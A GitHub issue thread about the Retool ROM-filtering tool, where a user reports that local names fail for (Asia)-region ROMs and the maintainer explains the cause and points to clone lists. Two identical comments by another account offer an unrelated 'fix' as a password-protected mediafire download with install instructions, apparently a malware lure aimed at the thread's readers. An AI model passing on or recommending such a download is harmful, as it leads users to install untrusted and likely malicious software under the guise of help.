### ISSUE TITLE
The Local Names function not works for (Asia)  ROM

### ISSUE THREAD

**Issue by yingw** [unexpectedpanda/retool#346]
**Describe the bug**
IF a ROM file is **"ASIA"** area with name **(ASIA)** in it, the local names function won't work.

**To reproduce**
Such as a ROM in Nintendo NES (no-intro) `Nintendo - Nintendo Entertainment System (Headerless) (20240829-004657).dat`:
```xml
	<game name="2-in-1 - Shuang Wang Ji (Asia) (Pirate)" id="6232">
		<category>Games</category>
		<description>2-in-1 - Shuang Wang Ji (Asia) (Pirate)</description>
		<rom name="2-in-1 - Shuang Wang Ji (Asia) (Pirate).unh" size="1048576" crc="e75107eb" md5="b901ce1f742830398dbfb3f2491c92f6" sha1="56decc1c31af53b2729dcfd0d85b1cfc031203ca" sha256="004a2914412d7b0ad3344120bbf29feac1b65a07355d8d39432c978c6f95ffc4"/>
	</game>
```
in Retool metadata:
```json
	"2-in-1 - Shuang Wang Ji (Asia) (Pirate)": {
		"languages": ["Zh"],
		"localName": "２－ｉｎ－１　雙王記"
	},
```
Also checked the local languages in Retool (Japanese, Chinese, English)  , but still output its original EN name:
```xml
	<game name="2-in-1 - Shuang Wang Ji (Asia) (Pirate)">
		<category>Games</category>
		<description>2-in-1 - Shuang Wang Ji (Asia) (Pirate)</description>
		<rom name="2-in-1 - Shuang Wang Ji (Asia) (Pirate).unh" size="1048576" crc="e75107eb" md5="b901ce1f742830398dbfb3f2491c92f6" sha1="56decc1c31af53b2729dcfd0d85b1cfc031203ca" sha256="004a2914412d7b0ad3344120bbf29feac1b65a07355d8d39432c978c6f95ffc4"/>
	</game>
```

but some other local names works, So I did a lot tests, and found: If I change the ROM name's `(Asia)` to `(China)` or `(USA)` in dat and metadata: 
```json
	"2-in-1 - Shuang Wang Ji (USA) (Pirate)": {
		"languages": ["Zh"],
		"localName": "２－ｉｎ－１　雙王記"
	},
```
and:
```xml
	<game name="2-in-1 - Shuang Wang Ji (USA) (Pirate)" id="6232">
		<category>Games</category>
		<description>2-in-1 - Shuang Wang Ji (USA) (Pirate)</description>
		<rom name="2-in-1 - Shuang Wang Ji (USA) (Pirate).unh" size="1048576" crc="e75107eb" md5="b901ce1f742830398dbfb3f2491c92f6" sha1="56decc1c31af53b2729dcfd0d85b1cfc031203ca" sha256="004a2914412d7b0ad3344120bbf29feac1b65a07355d8d39432c978c6f95ffc4"/>
	</game>
```
then it will work, and return:
```xml
	<game name="２－ｉｎ－１　雙王記 (USA) (Pirate)">
		<category>Games</category>
		<description>2-in-1 - Shuang Wang Ji (USA) (Pirate)</description>
		<rom name="2-in-1 - Shuang Wang Ji (USA) (Pirate).unh" size="1048576" crc="e75107eb" md5="b901ce1f742830398dbfb3f2491c92f6" sha1="56decc1c31af53b2729dcfd0d85b1cfc031203ca" sha256="004a2914412d7b0ad3344120bbf29feac1b65a07355d8d39432c978c6f95ffc4"/>
	</game>
```

Is that normal , that will need some other config to work for Asia? Or it's a bug?

Maybe there another thing confuse me.
If I change a ROM to (USA), I have to select a local language "English" to make it work. even if the file says `"languages": ["Zh"],`
So maybe there is no support language in ASIA?

Final question: is there a way to config multi local names on one ROM,  Retool say: "Some titles are multi-region, and have multiple local names", but I can't find example. I found a medata:
```json
	"29~10MG-in-1 (Asia) (En,Ja) (XB-F88) (Pirate)": {
		"languages": ["En", "Ja"]
	},
```
But I can't write multi local names under it such as:
```json
	"29~10MG-in-1 (Asia) (En,Ja) (XB-F88) (Pirate)": {
		"languages": ["En", "Ja"],
		"localName": ["Some English name", "人打ち麻雀"]
	},
or
		"localName": {"Some English name", "人打ち麻雀"}

or 
		"localName": "Some English name, 人打ち麻雀"
or

	"29~10MG-in-1 (Asia) (En,Ja) (XB-F88) (Pirate)": {
		"languages": ["En"],
		"localName": "Some English name"
	},
	"29~10MG-in-1 (Asia) (En,Ja) (XB-F88) (Pirate)": {
		"languages": ["Ja"],
		"localName": "人打ち麻雀"
	},


(BTW, if I write : "localName": "Some English name", "人打ち麻雀"    the app will crash.. Em .. I know it's not a correct JSON format)
```
to make it work, so is that supported?

**Retool edition**
- [x] retool-gui.exe
- [ ] retool.py
- [ ] retool-gui.py

**Retool version**
2.3.8

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by unexpectedpanda** [comment]
Without code diving or testing, I'd guess it's because the Asia region [doesn't have an implied language](https://github.com/unexpectedpanda/retool-clonelists-metadata/blob/main/config/internal-config.json#L528) set.

Supporting local names for such regions would require code changes for Retool, which is unlikely given it's [no longer maintained](https://github.com/unexpectedpanda/retool/issues/337).

**Comment by unexpectedpanda** [comment]
Only one name can be set in the metadata, as that's scraped from No-Intro/Redump and they only have one alternate name field.

To set multiple local names, you need to add them to clone lists. See [Local names](https://unexpectedpanda.github.io/retool/contribute-clone-lists-variants-local/#multi-language-names) in the documentation for more information.

**Comment by yingw** [comment]
> Only one name can be set in the metadata, as that's scraped from No-Intro/Redump and they only have one alternate name field. As it's scraped data, it's not meant to be edited.
> 
> To set multiple local names, you need to add them to clone lists. See [Local names](https://unexpectedpanda.github.io/retool/contribute-clone-lists-variants-local/#multi-language-names) in the documentation for more information.

Ok, got it, thanks ag
